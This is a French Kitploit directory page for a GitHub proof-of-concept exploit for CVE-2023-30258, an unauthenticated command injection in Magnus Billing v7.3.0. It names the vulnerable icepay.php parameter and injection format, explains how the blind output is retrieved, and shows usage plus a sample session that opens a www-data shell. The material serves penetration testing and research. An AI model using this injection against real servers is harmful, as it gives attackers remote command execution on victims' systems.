Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-30258-Magnus-Billing-v7-Command-Injection-PoC — Vulnérabilité d'injection de commande non authentifiée dans Magnus Billing v7.3.0. | Kitploit
Outils/GitHubGitHub/estebanzarate/cve-2023-30258-magnus-billing-v7-command-injection-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et Contrôle
GitHubestebanzarate/cve-2023-30258-magnus-billing-v7-command-injection-poc

CVE-2023-30258-Magnus-Billing-v7-Command-Injection-PoC

Vulnérabilité d'injection de commande non authentifiée dans Magnus Billing v7.3.0.

Voir le dépôt
11il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-30258 — Injection de commande dans Magnus Billing v7 (PoC)

Vulnérabilité d'injection de commande sans authentification dans Magnus Billing v7.3.0. Le paramètre GET democ dans icepay.php est passé directement à une fonction shell sans assainissement, permettant l'exécution arbitraire de commandes en tant qu'utilisateur du serveur web. L'injection est aveugle — la sortie n'est pas reflétée dans la réponse HTTP — donc cet exploit redirige la sortie de chaque commande vers un fichier dans la racine web et la récupère via HTTP.


Fonctionnement

  1. Envoie une requête GET à /mbilling/lib/icepay/icepay.php?democ=;<commande>;
  2. Redirige la sortie de la commande vers un fichier dans la racine web (out.txt).
  3. Récupère le fichier de sortie via HTTP et affiche le résultat.
  4. Nettoie le fichier de sortie à la sortie.

Si la cible utilise un chemin de racine web différent, ajustez OUTPUT_FILE en haut du script.

Prérequis

  • Python 3
  • Installer les dépendances :
root@kitploit:~
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit

Utilisation

root@kitploit:~
python3 exploit.py -t http://CIBLE

Exemple :

root@kitploit:~
$ python3 exploit.py -t http://10.10.10.10
[*] Test d'exécution de commande...
[+] La cible est vulnérable ! Sortie : uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell ouvert. Tapez 'exit' ou Ctrl+C pour quitter.

Shell> whoami
www-data

Références

  • CVE-2023-30258
  • EDB-52170
  • PoC original par Tinashe Matanda

Crédits

  • Découverte et exploit original : Tinashe Matanda (SadNinja) / CodeSecLab
  • Nettoyage et shell interactif : Esteban Zárate
Télécharger l’outil